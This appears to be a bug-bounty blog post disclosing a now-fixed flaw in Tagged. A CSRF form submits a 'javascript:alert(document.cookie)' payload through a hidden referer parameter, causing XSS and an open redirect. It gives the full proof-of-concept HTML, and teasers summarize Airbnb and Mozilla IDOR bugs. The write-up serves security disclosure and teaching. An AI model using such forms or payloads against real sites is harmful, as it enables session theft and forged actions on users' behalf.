XSS+CSRF attack in Tagged using Redirect parameter(Open URL Redirection attack Possible)

Hi guys,

Today i want to show you how you can combine XSS and CSRF attack.This is very interesting but pretty difficult to find and create a POC.

Bug type : XSS+CSRF
Bug category : XSS,CSRF
OWASP link :
1.https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
2.https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)

Description : In tagged you can report spam/abuse on any user.In HTTP POST request you will find a hidden parameter called "Referer" .This URL is used to redirect to you the URL you provide.You can also attack victim to Redirection attack to any website.
Now in Javascript when you give referrer as any URL,It will redirect you to given URL by you.But when you put javascript:alert(1) as a URL it will execute the code which you provide.
Attack Steps :
1. Create a CSRF POC where you will give XSS payload javascript:alert(1)
2.Click on the Button and you will get XSS pop up
3.You can also redirect victim to any malicious URL by putting URL in referrer.

XSS parameter used : javascript:alert(document.cookie) in referrer

Proxy Tool used : BurpSuite

HTML Code for CSRF:

<html>
<body>
<form  action="http://m.tagged.com/report_abuse.html "method="POST">
<input type ="hidden" name="report_userId" value="6025854846">
<input type="hidden" name="referer" value="javascript:alert(document.cookie)">
<input type="hidden" name ="contentId" value="1436985861035340" >
  <input type="hidden" name ="reason" value="threads" >
  <input type="submit">
</form>
</body>
</html>


Video POC :


Status : Fixed


Comments

Post a comment

Popular posts from this blog

Airbnb : Steal Earning of Airbnb hosts by Adding Bank Account/Payment Method (IDOR)

Image
Hi All, Company Info : Airbnb is an online marketplace and hospitality service, enabling people to lease or rent short-term lodging including vacation rentals, apartment rentals, homestays, hostel beds, or hotel rooms. The company does not own any lodging; it is merely a broker and receives percentage service fees (commissions) from both guests and hosts in conjunction with every booking. It has over 3,000,000 lodging listings in 65,000 cities and 191 countries,and the cost of lodging is set by the host. Bug category : Indirect Object Reference(IDOR) Link : https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References Technical Details of the Bug :  Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is Authorized for the target object. This results in an insecure direct object reference flaw. Testers can easily manipulate parameter values to detect such flaws. Code analysis
Read more

Email Address disclosure of all the Mozilla Add-ons Account(Indirect Object reference)

Hi All, Bug Title : Email Address disclosure of all the Mozilla Add-ons Account(Indirect Object reference) Bug type : Indirect object reference(IDOR) Category : Broken authentication and privilege escalation OWASP Link : https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References Organization : Mozilla Web Application Link : https://addons.mozilla.org/en-US/firefox/ Steps to reproduce: 1.Go to the link : https://addons.mozilla.org/en-US/firefox/users/edit 2.Here you will get a option to hide your email address from other users. Once you hide your email address no other user can see or get your email address associated with your account. But there is a way we can get email address of any user. Steps to reproduce : 1.create a collection and go to collection setting. 2.Now go to Contributor and add any valid email ID of any user. 3.Now save it and intercept this request. HTTP request : POST /en-US/firefox/collections/vijaykumar1110/mypersonalcollect
Read more